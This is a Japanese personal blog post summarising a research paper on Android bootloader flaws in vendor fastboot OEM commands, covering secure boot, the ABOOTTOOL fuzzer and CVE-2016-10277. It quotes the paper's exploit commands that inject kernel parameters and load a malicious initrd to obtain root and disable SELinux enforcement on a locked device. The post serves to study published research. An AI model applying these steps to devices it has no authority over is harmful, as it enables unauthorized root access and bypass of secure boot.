<!doctype html>
<html lang="en"><head>
    <title>fastboot oem vuln:Android Bootloader Vulnerabilities in Vendor Customizations</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="../../css/theme.css"/>
    
</head>
<body>
        <div id="content" class="mx-auto"><header class="container mt-sm-5 mt-4 mb-4 mt-xs-1">
    <div class="row">
        <div class="col-sm-4 col-12 text-sm-right text-center pt-sm-4">
            <a href="../../" class="text-decoration-none">
                <img id="home-image" class="rounded-circle"
                    
                        src="../../images/avatar.png"
                    
                />
            </a>
        </div>
        <div class="col-sm-8 col-12 text-sm-left text-center">
            <h2 class="m-0 mb-2 mt-4">
                <a href="../../" class="text-decoration-none">
                    
                        Naoya Miyaguchi
                    
                </a>
            </h2>
            <p class="text-muted mb-1">
                
                    
                
            </p>
            <ul id="nav-links" class="list-inline mb-2">
                
                
                    <li class="list-inline-item">
                        <a class="badge badge-white " href="../../about/" title="About">About</a>
                    </li>
                
                    <li class="list-inline-item">
                        <a class="badge badge-white " href="../../post/" title="Posts">Posts</a>
                    </li>
                
                    <li class="list-inline-item">
                        <a class="badge badge-white " href="../../tags/" title="Tags">Tags</a>
                    </li>
                
            </ul>
            <ul id="nav-social" class="list-inline">
                
                    <li class="list-inline-item mr-3">
                        <a href="https://github.com/mute1997" target="_blank">
                            <i class="fab fa-github fa-1x text-muted"></i>
                        </a>
                    </li>
                
            </ul>
        </div>
    </div>
    <hr />
</header>
<div class="container">
    <div class="pl-sm-2">
        <div class="mb-3">
            <h3 class="mb-0">fastboot oem vuln:Android Bootloader Vulnerabilities in Vendor Customizations</h3>
            
            <small class="text-muted">Published August 14, 2020</small>
        </div>

        <article>
            <p>androidのブートローダ周りの脆弱性やファジングってどうやってるんだろうっての気になってたらこの論文を見つけました。</p>
<p>いつもどおり適当なのでちゃんと知りたかったら論文読んでください。</p>
<h4 id="introduction">Introduction</h4>
<p>androidではchain-of-trustを通してセキュアブートを実装している。</p>
<p>PBLが次のブートローダの真正性を検証してSBLが起動、SBLがABOOTを検証するというのを続ける。
簡単にするとPBL -&gt; SBL -&gt; ABOOT -&gt; boot.imgみたいな感じで起動していくっぽい。</p>
<p>ABOOTには通常モードとfastbootモードの2つのモードがある。
ABOOTはOSの実行前に実行されているため脆弱性も重要な深刻度を持っている。</p>
<p>この論文では例をいくつか紹介する。</p>
<h4 id="fastbootの起動">fastbootの起動</h4>
<p>fastbootは様々な方法で起動できると言ってる。</p>
<ul>
<li>キーの組み合わせ</li>
<li>USBデバッグを有効にした状態でadb reboot</li>
</ul>
<p>キーの組み合わせっていうのは何を指してるのかよくわからなかったので調べてみた所、以下のドキュメントを見つけた。</p>
<p><a href="https://source.android.google.cn/setup/build/running?hl=ja#booting-into-fastboot-mode">https://source.android.google.cn/setup/build/running?hl=ja#booting-into-fastboot-mode</a></p>
<p>キーの組み合わせって言うのは物理キーの組み合わせの話らしい。</p>
<p>自分が持ってるPixel 3a XLだと音量小を押したまま電源を長押しすると起動できるっぽい。</p>
<p>太古の昔にTWRPを入れるために似たような操作をやっていたけど完全に失念していた。</p>
<h4 id="aboottool">ABOOTTOOL</h4>
<p>OEMコマンドを発見するためにABOOTTOOLというファズツールを開発したらしい。
<a href="https://github.com/alephsecurity/abootool">https://github.com/alephsecurity/abootool</a></p>
<p>これっぽい。</p>
<p>これによってメモリダンプ (ALEPH-2016000)などの脆弱性を発見できたと言ってる。</p>
<p>そして過去の脆弱性や今回見つかった脆弱性を4種類に分類して説明している。</p>
<ul>
<li>OSの完全性</li>
<li>データの流失</li>
<li>OSの隠れた機能</li>
<li>ICに対する攻撃</li>
</ul>
<p>今回はOSの完全性の辺りに焦点を当てて見てみる。</p>
<h4 id="osの完全性">OSの完全性</h4>
<p>いくつかあるっぽいけど今回はCVE-2016-10277に注目してみる。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-txt" data-lang="txt">$ fastboot oem config console &#34;a foo=A &#34;
$ fastboot oem config fsg-id &#34;a bar=B&#34;
$ fastboot oem config carrier &#34;a baz=C&#34;
[...]
shamu:/ $ dmesg | grep command
[    0.000000] Kernel command line: console=a foo=A ,115200,
    n8 earlyprintk androidboot.console=a foo=A  androidboot
    .hardware=shamu msm_rtb.filter=0x37 [...] androidboot.
    fsg-id=a bar=B androidboot.secure_hardware=1 [...]
    androidboot.carrier=a baz=C  androidboot.hard&lt;
</code></pre></div><p>こんな感じでlinux kernelの起動オプションに任意の値を含めることが出来るっぽい。</p>
<p>これを利用して、initrdを用意してfastbootでflash, rdinitに自分のinitrdを指定して起動するというのをやっている。
flashっていう操作はなんだかロックされていると出来なさそうに思えるけどこれはロックしててもいけるらしい。</p>
<p>これ以外にも再起動後も保つ方法とかいろいろ書いてあったので興味ある人は自分で読んでみて。</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-txt" data-lang="txt">$ fastboot oem config fsg-id &#34;a initrd=0x11000000,1518172&#34;
$ fastboot flash aleph malicious.cpio.gz
[...]
target reported max download size of 536870912 bytes
sending ’aleph’ (1482 KB)...
OKAY [  0.050s]
writing ’aleph’.
..(bootloader) Not allowed in LOCKED state!
FAILED (remote failure)
finished.
total time: 0.054s

$ fastboot continue
$ adb shellshamu:/ # id
uid=0(root) gid=0(root) groups=0(root),[...] context=u:r:su:s0
shamu:/ # setenforce permissive
shamu:/ # getenforce
Permissive
shamu:/ #
</code></pre></div>
        </article>
    </div>

            </div>
        </div><footer class="text-center pb-1">
    <small class="text-muted">
        
            &copy; Copyright 2020, Naoya Miyaguchi
        
        <br>
        Powered by <a href="https://gohugo.io/" target="_blank">Hugo</a>
        and <a href="https://github.com/austingebauer/devise" target="_blank">Devise</a>
    </small>
</footer>
</body>
</html>
